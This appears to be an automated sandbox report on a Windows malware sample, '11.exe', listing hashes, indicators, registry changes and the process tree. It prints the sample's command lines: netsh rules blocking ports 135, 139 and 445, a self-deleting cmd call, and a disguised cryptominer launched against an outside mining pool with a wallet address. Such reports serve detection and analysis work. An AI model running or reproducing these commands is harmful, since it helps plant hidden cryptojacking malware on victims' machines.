Analysis
-
max time kernel
29s -
max time network
117s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
07-05-2021 13:05
Static task
static1
Behavioral task
behavioral1
Sample
11.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
11.exe
Resource
win10v20210410
General
-
Target
11.exe
-
Size
1.4MB
-
MD5
1fc1c860e86a8fbc2021d2567d62f703
-
SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3
-
SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
-
SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
wudfhosts.exepid process 3444 wudfhosts.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 1556 svchost.exe -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1556 set thread context of 2448 1556 svchost.exe svchost.exe -
Drops file in Windows directory 5 IoCs
Processes:
11.exesvchost.exedescription ioc process File created C:\Windows\Help\active_desktop_render.dll 11.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe 11.exe File created C:\Windows\Cursors\WUDFhosts.exe 11.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
svchost.exepid process 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe 2448 svchost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
svchost.exewudfhosts.exedescription pid process Token: SeRestorePrivilege 2448 svchost.exe Token: SeBackupPrivilege 2448 svchost.exe Token: SeSecurityPrivilege 2448 svchost.exe Token: SeTakeOwnershipPrivilege 2448 svchost.exe Token: SeLockMemoryPrivilege 3444 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
11.exesvchost.exesvchost.exepid process 2112 11.exe 1556 svchost.exe 2448 svchost.exe 2448 svchost.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
11.exesvchost.exesvchost.exedescription pid process target process PID 2112 wrote to memory of 1168 2112 11.exe netsh.exe PID 2112 wrote to memory of 1168 2112 11.exe netsh.exe PID 2112 wrote to memory of 1168 2112 11.exe netsh.exe PID 2112 wrote to memory of 2732 2112 11.exe netsh.exe PID 2112 wrote to memory of 2732 2112 11.exe netsh.exe PID 2112 wrote to memory of 2732 2112 11.exe netsh.exe PID 2112 wrote to memory of 3176 2112 11.exe netsh.exe PID 2112 wrote to memory of 3176 2112 11.exe netsh.exe PID 2112 wrote to memory of 3176 2112 11.exe netsh.exe PID 2112 wrote to memory of 2736 2112 11.exe netsh.exe PID 2112 wrote to memory of 2736 2112 11.exe netsh.exe PID 2112 wrote to memory of 2736 2112 11.exe netsh.exe PID 2112 wrote to memory of 3372 2112 11.exe netsh.exe PID 2112 wrote to memory of 3372 2112 11.exe netsh.exe PID 2112 wrote to memory of 3372 2112 11.exe netsh.exe PID 2112 wrote to memory of 3852 2112 11.exe netsh.exe PID 2112 wrote to memory of 3852 2112 11.exe netsh.exe PID 2112 wrote to memory of 3852 2112 11.exe netsh.exe PID 2112 wrote to memory of 1272 2112 11.exe netsh.exe PID 2112 wrote to memory of 1272 2112 11.exe netsh.exe PID 2112 wrote to memory of 1272 2112 11.exe netsh.exe PID 2112 wrote to memory of 752 2112 11.exe netsh.exe PID 2112 wrote to memory of 752 2112 11.exe netsh.exe PID 2112 wrote to memory of 752 2112 11.exe netsh.exe PID 2112 wrote to memory of 740 2112 11.exe netsh.exe PID 2112 wrote to memory of 740 2112 11.exe netsh.exe PID 2112 wrote to memory of 740 2112 11.exe netsh.exe PID 2112 wrote to memory of 1228 2112 11.exe netsh.exe PID 2112 wrote to memory of 1228 2112 11.exe netsh.exe PID 2112 wrote to memory of 1228 2112 11.exe netsh.exe PID 2112 wrote to memory of 3164 2112 11.exe netsh.exe PID 2112 wrote to memory of 3164 2112 11.exe netsh.exe PID 2112 wrote to memory of 3164 2112 11.exe netsh.exe PID 2112 wrote to memory of 1364 2112 11.exe cmd.exe PID 2112 wrote to memory of 1364 2112 11.exe cmd.exe PID 2112 wrote to memory of 1364 2112 11.exe cmd.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 1556 wrote to memory of 2448 1556 svchost.exe svchost.exe PID 2448 wrote to memory of 3444 2448 svchost.exe wudfhosts.exe PID 2448 wrote to memory of 3444 2448 svchost.exe wudfhosts.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter12⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion12⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\11.exe"2⤵
-
\??\c:\windows\syswow64\svchost.exec:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
memory/740-122-0x0000000000000000-mapping.dmp
-
memory/752-121-0x0000000000000000-mapping.dmp
-
memory/1168-114-0x0000000000000000-mapping.dmp
-
memory/1228-123-0x0000000000000000-mapping.dmp
-
memory/1272-120-0x0000000000000000-mapping.dmp
-
memory/1364-126-0x0000000000000000-mapping.dmp
-
memory/2448-133-0x0000000010072B6D-mapping.dmp
-
memory/2448-128-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2448-131-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2448-130-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2448-136-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2448-129-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2732-115-0x0000000000000000-mapping.dmp
-
memory/2736-117-0x0000000000000000-mapping.dmp
-
memory/3164-124-0x0000000000000000-mapping.dmp
-
memory/3176-116-0x0000000000000000-mapping.dmp
-
memory/3372-118-0x0000000000000000-mapping.dmp
-
memory/3444-138-0x0000000000000000-mapping.dmp
-
memory/3444-140-0x000002612B900000-0x000002612B910000-memory.dmpFilesize
64KB
-
memory/3444-141-0x000002612B920000-0x000002612B930000-memory.dmpFilesize
64KB
-
memory/3444-143-0x000002612B930000-0x000002612B940000-memory.dmpFilesize
64KB
-
memory/3444-142-0x000002612B940000-0x000002612B950000-memory.dmpFilesize
64KB
-
memory/3852-119-0x0000000000000000-mapping.dmp